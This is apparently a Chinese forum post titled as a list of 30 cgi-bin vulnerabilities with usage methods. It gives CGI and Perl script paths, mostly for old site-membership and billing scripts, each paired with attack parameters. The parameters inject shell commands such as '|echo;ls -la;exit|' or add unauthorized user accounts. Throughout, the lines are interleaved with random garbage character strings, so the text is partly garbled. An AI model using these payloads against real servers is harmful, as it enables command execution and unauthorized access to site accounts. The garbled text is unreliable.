Cgi-bin 30个漏洞＋使用方法

admin

==============================
0 P" Q, p6 G0 ^  y7 c
5 v5 ]& e$ j- L5 l- ?/smspass.pl
6 q9 a! A& D" j  C: j9 d4 c' Nusername=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
8 m1 }7 Q) R6 B8 W1 |0 yAction=Add&Username=Username&Password=Password
+ E6 R. R8 b/ j8 Y
/accountcreate.cgi
9 H5 i  \8 m* S- `, p9 e6 a9 tusername=username&password=password&ref1=|echo;ls|
5 f! w& F$ C) u* O  I! F& G# D
8 @5 o4 L: d. [" ^/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
0 P7 R5 `! T' h; y# {& G8 o* w
, R9 C: [+ o% ~0 m" B/addusr.pl
: I' [: |  l* d( u/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

7 H$ r; ?- l9 S/ccbill-local.asp
# G& j# F( ]' x( Rpost_values=username:password

/count.cgi
4 e9 [1 s1 _& Wpinfile=|echo;ls -la;exit|

/recon.cgi
  F2 m( T# D3 J* c. Z, H& j& \/recon.cgi?search
  E7 [- `2 W  v- x6 g/ @% ]* Csearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|
, s& v' J$ ?' x* D, t
$ T8 x, [3 t1 ]6 n1 [9 [% `3 H/modify.cgi
! N: }2 g9 l% I/ }: ausername=username&password=password&expire=30
" T" H! [# K: @4 p& }1 O
/openjournal.cgi
8 K! B/ _" ?0 m% a! z1 cedit=1&ct=2&go=|echo;ls -al;exit|
* r. |4 s- X: D& d
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
9 O& a) ]6 Y! _4 n
/probecontrol.cgi
- L7 z/ l$ s0 B0 Dcommand=enable&username=username&password=password

- S, t, R7 \$ C" W/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
3 H5 F% F! q! X9 f/ W3 J! B
/htadd.pl
configfile=|echo; ls -alt; exit
3 h0 h. F" e; G( p
; i0 S$ k' U3 J( b4 L/gx9passwd.cgi
+ j# A; y: J0 n& h" @+ B# Pcmd=ADD&user=username&pass=password
5 B5 M+ x8 ~0 m7 w1 Y7 B% Z) ~
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
3 O" j. A8 m4 Q6 o2 Y5 fcommand=add_member&username=username(EMAIL)&password=password(DES)
1 i: W9 C2 P9 w( z5 B
' M6 E* R' B. ?' l- s4 @/globill_ut.cgi
8 O4 R6 p0 c2 }$ E0 m4 zdo=add&username=username&password=password&wpassword=password
) s' L' r3 K2 X$ E% R
/usercontrol.cgi
- j) J% O: z" n' }8 F- d+ t, Q4 `/ ocommand=enable&username=USER&password=PASS
7 u" r: H/ m, A1 _8 n
/globoSALErum.cgi
. J) z# l$ r, }  ^action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
9 f% a0 r" e% E: N( w" euser=USER&pass=PASS&confirm=PASS

7 }: x( x- @# P, g3 p) ^' @/pincount.cgi
; y6 k% C/ y3 M4 Z3 ]5 r/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
7 o$ a* V$ E" k6 a, i2 ^
/af.cgi
3 R1 @# U$ Q" q% y5 E) C, u) L/env.cgi
6 r  B7 b5 A/ I: G9 h' w4 vADD+;echo;pwd;exit
9 n2 y% ~5 j) Y* S+ O
/count.cgi
pinfile=|echo;pwd;exit|
9 z3 C# I  _) q( x7 A4 u
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

- ~, ?9 I* s) e% t( q/add.cgi
username=username&password=password&expire=30
% k: P9 }; O3 ]+ f" i. i
==============================
! _- \- v; }+ o, J8 u% |